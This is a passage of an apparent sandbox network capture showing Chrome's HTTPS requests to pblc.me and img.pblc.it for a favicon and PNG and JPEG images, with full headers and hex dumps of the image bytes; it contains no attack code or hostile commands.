                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 00 ff 40 44 d7 54 dc 3c 66 3e 06 c0 65 a1 72 fc 32 1c 45 10 dd 4e 12 e8 cf 83 55 b8 3c 20 ef 2e 00 fb 3d c5 3b a3 a4 ed 63 ca 28 a4 d0 02 b2 bc a7 94 1a 8d b8 b4 ef 78 f2 4e 13 8c 2d ba 50 c4 14 6c e0 f9 0c cf 02 db 21 34 86 e0 39 54 21 60 df 18 33 8f 99 ff 11 c0 a3 00 ae 90 ad 40 73 01 cc 16 6b 7e 36 80 81 00 28 de c9 18 2e b1 c0 d0 90 b7 90 36 24 da 7b 2b 11 dd ca cc b7 4a 44 fa 56 00 17 78 63 af d1 10 65 e5 82 80 d3 4b ad 2b 17 1b 70 c1 79 ad f5 81 40 03 cd ab 56 3d 00 4f 58 6b 7f 6d 8c f9 4f 6b ed af 01 d8 0a 14 65 e6 b9 8e 1b d9 34 c6 5c 09 e0 17 00 7e 29 20 de 13 62 ad 45 c3 e6 09 e2 df 3c 67 a0 7d 0a c0 7f 56 f5 00 f0 1f c2 3f a9 30 9b d9 22 db 07 9c ac fe dd e5 d2 28 a5 0e 03 d8 e9 01 d6 8d 14 1d 22 04 78 c7 22 2e 44 34 ec 9d d0 39 ee ad 62 c9 88
                                                                                                                                                                                                        Data Ascii: @DT<f>er2ENU< .=;c(xN-Pl!49T!`3@sk~6(.6${+JDVxceK+py@V=OXkmOke4\~) bE<g}V?0"("x".D49b
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 52 47 8e 97 d9 03 e0 4e fc f7 4e fb 35 00 3e 62 ad 7d 5e 26 f8 85 00 ce 94 0a 8d 08 6e 31 16 09 65 c6 fa f6 31 61 4b cf 92 1d e8 1f b4 d6 be c6 cc 73 64 1f d6 4c 09 67 3e ea 98 8a d5 0a 3a c0 cc eb ad b5 3f 36 c6 7c 0c 89 23 7e bd b0 fb 72 6b ed af 98 79 7d ab d5 fa 2e 33 ef b2 d6 3e c9 cc 97 a1 4b fd 7f d6 18 f3 b0 e0 1c 2b 05 60 07 11 bd 28 3e 3c 84 b3 b2 4d ac c3 b9 44 f4 03 6b ed 77 c4 9d bc a9 8a b0 86 08 86 09 57 2d 6a 71 14 28 fe a8 4b e8 4f 7a ad f5 98 b5 76 0b 11 5d e0 13 43 3d 25 b0 10 c0 77 bc f6 7c 40 a2 bd 0d 63 cc 3c 19 1b 4d af dd 6f 0b 51 1d 42 8b 48 62 6c ec a9 02 19 11 1c 2e 44 70 6d 10 d1 9f 32 f3 25 44 74 40 08 c8 33 bd f6 d9 07 e0 5e a5 d4 b8 93 df 4b e8 1e 93 33 28 75 ac f6 ea 5d 2f b8 cd 2c 22 1a 48 1c 48 78 c4 c2 f4 e5 95 71 bd 41
                                                                                                                                                                                                        Data Ascii: RGNN5>b}^&n1e1aKsdLg>:?6|#~rky}.3>K+`(><MDkwW-jq(KOzv]C=%w|@c<MoQBHbl.Dpm2%Dt@3^K3(u]/,"HHxqA
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1359INData Raw: 92 9b b8 25 27 93 96 a6 4d d5 a1 17 45 5c 7a 93 48 09 3e 55 72 85 7a 9d 9b 4c 02 13 63 01 80 9f 0a ce 92 22 51 ba 8f 36 a1 bb 25 a9 c1 cc 1f 24 a2 bf f4 a8 29 c8 00 c7 a1 c3 fa 8e a2 83 30 f3 35 ad 56 eb f1 d8 b8 10 1c e7 88 c2 92 77 f6 03 38 a9 d5 6a ed 28 59 f8 4a 0e 01 cc a5 29 c9 33 77 89 4b 28 6d 6a 0e e5 ae 74 4f d5 ab ce 3c 48 a5 8d a5 2f b9 85 2a 26 5f 6a 5c 97 c8 db ac 7b 01 42 ea 82 88 52 c2 69 2a af d2 0b 28 4b 8f 84 c9 1d cf 5a 7a f8 60 c9 d1 c5 29 2b 28 94 36 74 ee 57 ec a6 a0 d4 bb b1 72 1d 1a c5 76 00 0f 88 d2 49 2a 1b e7 73 8a 9c 43 95 8c 58 66 48 83 29 32 ef eb 44 64 62 41 83 d8 31 c2 3e 8d a5 e4 92 8f 44 14 b5 0e 2d 27 1b e8 c8 9d d9 9f fa 2e 97 36 57 e7 5e cb ce a5 cd 1d c1 54 e7 4c fd 54 9f 95 ca db c8 59 00 a9 ed 1f b1 6b be 53 57 7b
                                                                                                                                                                                                        Data Ascii: %'ME\zH>UrzLc"Q6%$)05Vw8j(YJ)3wK(mjtO<H/*&_j\{BRi*(KZz`)+(6tWrvI*sCXfH)2DdbA1>D-'.6W^TLTYkSW{
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        21192.168.2.549761172.67.129.2394436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC543OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                        Host: pblc.me
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1227INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:03 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        content-security-policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                        x-dns-prefetch-control: off
                                                                                                                                                                                                        expect-ct: max-age=0
                                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                        x-download-options: noopen
                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                        x-permitted-cross-domain-policies: none
                                                                                                                                                                                                        referrer-policy: no-referrer
                                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                                        vary: Origin
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMcD8TIpgo1vLufL0eO%2FLbrmD%2F4y8myg1aFc5fyHOhEzqeqXQ8iwKgrJetqL1cToVrrkUgktt7Cy6v7otpWNf6VA35cycnyf1tkJVPcuEAHp9A%2BXOWTAhUga"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615468c600cb0-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC33INData Raw: 31 62 0d 0a 6e 6f 74 20 66 6f 75 6e 64 3a 20 47 45 54 20 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 0d 0a
                                                                                                                                                                                                        Data Ascii: 1bnot found: GET /favicon.ico
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        22192.168.2.549765188.114.97.34436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC378OUTGET /i/300x0x8.f.DOST/x/created_in_publicate.png HTTP/1.1
                                                                                                                                                                                                        Host: img.pblc.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:03 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        cache-control: public, max-age=7200
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 14:50:45 GMT
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Age: 2792
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TkrP3vUZ7LHbu2ZcC3H8eWjNX29nT%2BJxvQueMnLicFLE%2Fw2Qk4YtdxbiryIGv6b4DOLOkwbyloRypTCYh13SJPNcFUsa%2B6DpOre3CT4IOMHbeBWWMoKfuwKvl6Po9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615484d2d431a-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC690INData Raw: 32 32 61 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 2a 08 06 00 00 00 09 53 66 dc 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 da e5 5d 7b 8c 9d c5 75 ff 9d ab ab d5 6a b5 dd 58 8e eb ba 96 e3 38 d4 72 5d ea 3a ae eb 00 01 43 1c 9e 01 32 73 79 3f 12 c2 cb 24 40 08 75 a1 b8 49 4a 91 e5 22 27 25 84 92 34 a1 a9 13 cc 3b 24 3c 0a be 33 40 09 81 84 38 06 1c 42 09 a5 ae 8b 5c d7 b1 2c cb 5a 59 96 65 59 ab 95 b5 5a dd d3 3f ee f9 dc f1 ec bc be bb 9b 4a 6d af b4 da dd fb 7d f3 38 f3 38 73 ce ef fc 66 86 00 34 98 b9 03 00 44 74 e4 6f ff 43 44 0d f7 7f f7 3d 37 5d ea bd 3a 9f a9 ce c7 97 31 27 6b 49 3b e4 f2 2c f9 3f 24 a3 5f e7 54 1d 63 bf 4b d3 f9 df 5b 6b fb 01 cc 03 f0 09 00 e7 02
                                                                                                                                                                                                        Data Ascii: 22acPNGIHDR,*SfpHYs+ IDATx]{ujX8r]:C2sy?$@uIJ"'%4;$<3@8B\,ZYeYZ?Jm}88sf4DtoCD=7]:1'kI;,?$_TcK[k
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 12 00 cd 9c 55 95 b1 a8 72 8a ee 6d 00 57 01 d8 56 61 5b a9 c1 db 4b 5b 95 58 f8 bd 60 95 b9 7a 95 58 f6 53 29 ef ff f7 4f 23 e5 6f a7 4c e6 a3 cc b4 84 c9 97 ca 37 97 3e 87 01 94 82 f6 44 d4 48 d5 f7 88 f6 4e b8 9c 25 d6 5c 4e b6 5e ca 2d ad 47 ac 9d 7d d9 ad b5 0d 00 b3 00 3c c5 cc 9f 72 95 15 33 1f 51 36 ee df 95 e2 09 01 ef ee bb 1e 1e ea be b2 94 99 9f 67 e6 e5 d6 da 46 6c a5 0f fd b8 63 cf fd 5d 2a af fb 7f 2c ef d0 3b a1 3c 63 e5 c6 fa 32 96 a6 17 79 43 f2 fb f5 ce 95 1f 92 31 34 26 4b f3 2e ad 53 69 de 25 f2 26 35 7e 6a a2 e4 56 90 d2 7c 7d 85 58 ba 0a a5 26 7c c9 24 2f 51 b2 93 51 b6 93 51 b2 75 07 5f 0a 6c 0e d4 73 3a 80 ef 03 38 55 a2 7c 47 7e 88 e8 88 a2 71 ff f6 95 90 af d4 aa 77 dd b4 81 f2 e7 12 d1 0f 00 ac c8 61 98 b1 36 71 ad 97 14 50 9e
                                                                                                                                                                                                        Data Ascii: UrmWVa[K[X`zXS)O#oL7>DHN%\N^-G}<r3Q6gFlc]*,;<c2yC14&K.Si%&5~jV|}X&|$/QQQu_ls:8U|G~qwa6qP
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: db 9c af 1e 52 4a 5d e3 58 4d 7d 22 df 51 75 f2 e5 6a b7 db 33 89 e8 b5 0a c3 92 cf 55 d5 18 72 22 84 d3 01 cc 60 e6 bd 5a eb 43 29 9c d6 51 76 4d 71 1d c7 94 52 e3 39 2f c9 1f 57 12 51 6e 02 38 5c a5 8f 29 18 63 cc 00 33 bf 02 e0 38 a7 df af 57 4a 7d b7 74 9f ab 53 e7 7e a9 f3 58 a8 dd 8e 28 2c 63 cc 0c 00 4f 00 58 21 df 8d 01 38 28 69 a6 39 9d f0 0e 11 9d 5d ad b8 75 b6 4e e4 1a ac 8e 46 8f 59 1f c6 98 13 88 e8 8d ca 5d d1 5a b7 4a 00 d8 ba fb c3 9c 01 75 1f 11 7d 5e da e6 fa 56 ab 75 7f 6e 95 68 b7 db f3 01 fc 8b 28 ac 5d 4a a9 0f f5 5a 7e ee 99 31 e6 4b cc bc 2e 06 ae 27 c8 a1 1d b1 ac 1e 90 7c fa 01 dc 0b e0 5a 0f 68 df 45 44 2b 99 f9 d5 56 ab 05 63 cc 10 33 ff 14 c0 12 df b5 0c ad c2 12 31 3c 4b 6b 3d 1e 92 c1 5a bb 08 c0 dd cc 5c ed 71 3c 04 60 15
                                                                                                                                                                                                        Data Ascii: RJ]XM}"Quj3Ur"`ZC)QvMqR9/WQn8\)c38WJ}tS~X(,cOX!8(i9]uNFY]ZJu}^Vunh(]JZ~1K.'|ZhED+Vc31<Kk=Z\q<`
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 32 cf fd e7 55 fa 11 00 af ca c2 7e 82 58 39 d5 ab 73 98 f9 1e 63 cc b9 82 07 4f 08 80 78 96 6b 23 50 ce 04 25 d1 6e b7 97 12 d1 bd 00 a6 79 4a 66 98 88 f6 30 f3 00 11 cd 77 a8 10 e3 00 de 74 5c e0 cd 44 f4 10 80 cf 4b ba 9d 00 36 11 d1 bf 03 78 9f d0 13 16 3a 75 38 55 14 ef 26 19 cb ff 08 e0 d7 44 f4 65 0f 8b 7b 48 a0 81 aa af 86 1d 57 78 10 c0 83 8e 55 5e 45 15 37 03 d8 06 60 96 58 65 55 74 b4 4f e6 c4 e6 86 4c 9a 13 5d 77 38 b4 92 2b a5 46 01 9c 05 e0 fd cc fc 7e 00 7f e7 74 fe 34 66 5e 48 44 0b 01 fc 31 11 b5 99 f9 4a 66 5e e0 9a 82 c6 98 25 44 f4 0b 66 be 93 99 97 cb fb cb 00 7c 89 99 5f 33 c6 68 f1 a7 2b c1 a6 13 d1 f3 cc 7c 1f 11 69 66 5e 28 8d 77 26 33 af 03 f0 86 b5 76 85 d3 81 73 01 cc 73 34 fb a0 a4 f9 6d 87 93 34 08 e0 fb 44 f4 7d 66 be 44 ea
                                                                                                                                                                                                        Data Ascii: 2U~X9scOxk#P%nyJf0wt\DK6x:u8U&De{HWxU^E7`XeUtOL]w8+F~t4f^HD1Jf^%Df|_3h+|if^(w&3vss4m4D}fD
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 06 c0 65 a1 72 fc 32 1c 45 10 dd 4e 12 e8 cf 83 55 b8 3c 20 ef 2e 00 fb 3d c5 3b a3 a4 ed 63 ca 28 a4 d0 02 b2 bc a7 94 1a 8d b8 b4 ef 78 f2 4e 13 8c 2d ba 50 c4 14 6c e0 f9 0c cf 02 db 21 34 86 e0 39 54 21 60 df 18 33 8f 99 ff 11 c0 a3 00 ae 90 ad 40 73 01 cc 16 6b 7e 36 80 81 00 28 de c9 18 2e b1 c0 d0 90 b7 90 36 24 da 7b 2b 11 dd ca cc b7 4a 44 fa 56 00 17 78 63 af d1 10 65 e5 82 80 d3 4b ad 2b 17 1b 70 c1 79 ad f5 81 40 03 cd ab 56 3d 00 4f 58 6b 7f 6d 8c f9 4f 6b ed af 01 d8 0a 14 65 e6 b9 8e 1b d9 34 c6 5c 09 e0 17 00 7e 29 20 de 13 62 ad 45 c3 e6 09 e2 df 3c 67 a0 7d 0a c0 7f 56 f5 00 f0 1f c2 3f a9 30 9b d9 22 db 07 9c ac fe dd e5 d2 28 a5 0e 03 d8 e9 01 d6 8d 14 1d 22 04 78 c7 22 2e 44 34 ec 9d d0 39 ee ad 62 c9 88 61 85 e9 a4 68 05 ce a4 3a 1b
                                                                                                                                                                                                        Data Ascii: er2ENU< .=;c(xN-Pl!49T!`3@sk~6(.6${+JDVxceK+py@V=OXkmOke4\~) bE<g}V?0"("x".D49bah:
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 4e fb 35 00 3e 62 ad 7d 5e 26 f8 85 00 ce 94 0a 8d 08 6e 31 16 09 65 c6 fa f6 31 61 4b cf 92 1d e8 1f b4 d6 be c6 cc 73 64 1f d6 4c 09 67 3e ea 98 8a d5 0a 3a c0 cc eb ad b5 3f 36 c6 7c 0c 89 23 7e bd b0 fb 72 6b ed af 98 79 7d ab d5 fa 2e 33 ef b2 d6 3e c9 cc 97 a1 4b fd 7f d6 18 f3 b0 e0 1c 2b 05 60 07 11 bd 28 3e 3c 84 b3 b2 4d ac c3 b9 44 f4 03 6b ed 77 c4 9d bc a9 8a b0 86 08 86 09 57 2d 6a 71 14 28 fe a8 4b e8 4f 7a ad f5 98 b5 76 0b 11 5d e0 13 43 3d 25 b0 10 c0 77 bc f6 7c 40 a2 bd 0d 63 cc 3c 19 1b 4d af dd 6f 0b 51 1d 42 8b 48 62 6c ec a9 02 19 11 1c 2e 44 70 6d 10 d1 9f 32 f3 25 44 74 40 08 c8 33 bd f6 d9 07 e0 5e a5 d4 b8 93 df 4b e8 1e 93 33 28 75 ac f6 ea 5d 2f b8 cd 2c 22 1a 48 1c 48 78 c4 c2 f4 e5 95 71 bd 41 a2 e2 1d 17 ac 76 c9 94 6e e0
                                                                                                                                                                                                        Data Ascii: N5>b}^&n1e1aKsdLg>:?6|#~rky}.3>K+`(><MDkwW-jq(KOzv]C=%w|@c<MoQBHbl.Dpm2%Dt@3^K3(u]/,"HHxqAvn
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1349INData Raw: a1 17 45 5c 7a 93 48 09 3e 55 72 85 7a 9d 9b 4c 02 13 63 01 80 9f 0a ce 92 22 51 ba 8f 36 a1 bb 25 a9 c1 cc 1f 24 a2 bf f4 a8 29 c8 00 c7 a1 c3 fa 8e a2 83 30 f3 35 ad 56 eb f1 d8 b8 10 1c e7 88 c2 92 77 f6 03 38 a9 d5 6a ed 28 59 f8 4a 0e 01 cc a5 29 c9 33 77 89 4b 28 6d 6a 0e e5 ae 74 4f d5 ab ce 3c 48 a5 8d a5 2f b9 85 2a 26 5f 6a 5c 97 c8 db ac 7b 01 42 ea 82 88 52 c2 69 2a af d2 0b 28 4b 8f 84 c9 1d cf 5a 7a f8 60 c9 d1 c5 29 2b 28 94 36 74 ee 57 ec a6 a0 d4 bb b1 72 1d 1a c5 76 00 0f 88 d2 49 2a 1b e7 73 8a 9c 43 95 8c 58 66 48 83 29 32 ef eb 44 64 62 41 83 d8 31 c2 3e 8d a5 e4 92 8f 44 14 b5 0e 2d 27 1b e8 c8 9d d9 9f fa 2e 97 36 57 e7 5e cb ce a5 cd 1d c1 54 e7 4c fd 54 9f 95 ca db c8 59 00 a9 ed 1f b1 6b be 53 57 7b c7 9e fb 37 6a 84 d2 a7 ae f8
                                                                                                                                                                                                        Data Ascii: E\zH>UrzLc"Q6%$)05Vw8j(YJ)3wK(mjtO<H/*&_j\{BRi*(KZz`)+(6tWrvI*sCXfH)2DdbA1>D-'.6W^TLTYkSW{7j
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        23192.168.2.549766188.114.97.34436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC447OUTGET /i/600x315x9.coords.DO.25,038402457757297x0-74,9615975422427x100/7c758/66cd5c5f19c3010c7f1c2f4d_pdf-real-logo.jpg HTTP/1.1
                                                                                                                                                                                                        Host: img.pblc.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:04 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        cache-control: public, max-age=7200
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 14:21:48 GMT
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Age: 1
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hamw5E%2BXtdNS5Lyt1Gq5h%2FDd8nK2CoNE5xKQUEpyUSEMtKsfO1ZcR1j8sWH2uODr%2FoHHf9v3sihQYBv5VhXFCw0zvrswf2wH2y0EZXaJ47s%2B3rvFmNFZIzNVxS4Djw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb6154bb9e3425c-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC690INData Raw: 37 64 30 63 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52
                                                                                                                                                                                                        Data Ascii: 7d0cJFIFExifII*/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:R
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 41 45 45 32 31 35 37 35 38 37 43 42 31 31 45 39 42 42 34 44 38 32 37 43 42 33 45 43 43 41 44 44 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 41 45 45 32 31 35 37 36 38 37 43 42 31 31 45 39 42 42 34 44 38 32 37 43 42 33 45 43 43 41 44 44 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff db 00 43 00 04 03 03 04 03 03 04 04 04 04 05 05 04 05 07 0b 07 07 06 06 07 0e 0a 0a 08 0b 10 0e 11 11 10 0e 10 0f 12 14 1a 16 12 13 18 13 0f 10 16 1f 17 18 1b 1b 1d 1d 1d 11 16 20 22 1f 1c 22 1a 1c 1d 1c ff db 00 43 01 05 05
                                                                                                                                                                                                        Data Ascii: :instanceID="xmp.iid:AEE2157587CB11E9BB4D827CB3ECCADD" stRef:documentID="xmp.did:AEE2157687CB11E9BB4D827CB3ECCADD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>C ""C
                                                                                                                                                                                                        2024-08-30 16:16:04 UTC1369INData Raw: 3f c9 eb 8e a1 f3 ba 8f f9 e5 07 f9 3d 71 d4 3e 77 51 ff 00 3c a0 ff 00 27 ae 3a 87 ce ea 3f e7 94 1f e4 f5 c7 50 f9 dd 47 fc f2 83 fc 9e b8 ea 1f 3b a8 ff 00 9e 50 7f 93 d7 1d 43 e7 75 1f f3 ca 0f f2 7a e3 a8 7c ee a3 fe 79 41 fe 4f 5c 75 0f 9d d4 7f cf 28 3f c9 eb 8e a1 f3 ba 8f f9 e5 07 f9 3d 71 d4 3e 77 51 ff 00 3c a0 ff 00 27 ae 3a 87 ce ea 3f e7 94 1f e4 f5 c7 50 f9 dd 47 fc f2 83 fc 9e b8 ea 1f 3b a8 ff 00 9e 50 7f 93 d7 1d 43 e7 75 1f f3 ca 0f f2 7a e3 a8 7c ee a3 fe 79 41 fe 4f 5c 75 0f 9d d4 7f cf 28 3f c9 eb 8e a1 f3 ba 8f f9 e5 07 f9 3d 71 d4 3e 77 51 ff 00 3c a0 ff 00 27 ae 3a 87 ce ea 3f e7 94 22 fe d3 d7 2b 7e c9 3f 37 99 fd ad ff 00 cf 28 89 5b 7f 6a 2b af ca 55 4e d6 94 ff 00 cf a8 72 2d fe d3 57 15 a5 93 dc 5c 8d ad 2b 35 ee 15 34 bb 56
                                                                                                                                                                                                        Data Ascii: ?=q>wQ<':?PG;PCuz|yAO\u(?=q>wQ<':?PG;PCuz|yAO\u(?=q>wQ<':?"+~?7([j+UNr-W\+54V
